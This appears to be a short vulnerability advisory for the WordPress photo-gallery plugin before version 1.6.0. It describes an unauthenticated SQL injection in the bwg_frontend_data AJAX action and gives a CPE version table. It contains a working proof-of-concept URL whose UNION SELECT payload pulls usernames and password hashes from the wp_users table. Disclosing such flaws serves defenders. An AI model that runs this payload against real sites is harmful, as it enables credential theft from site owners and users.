The plugin does not validate and escape the bwg_tag_id_bwg_thumbnails_0 parameter before using it in a SQL statement via the bwg_frontend_data AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL injection
https://example.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode;_id=1&bwg;_tag_id_bwg_thumbnails_0[]=)%22%20union%20select%201,2,3,4,5,6,7,concat(user_login,%200x2c,%20user_pass),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20wp_users%20–%20g
CPE | Name | Operator | Version |
---|---|---|---|
photo-gallery | lt | 1.6.0 |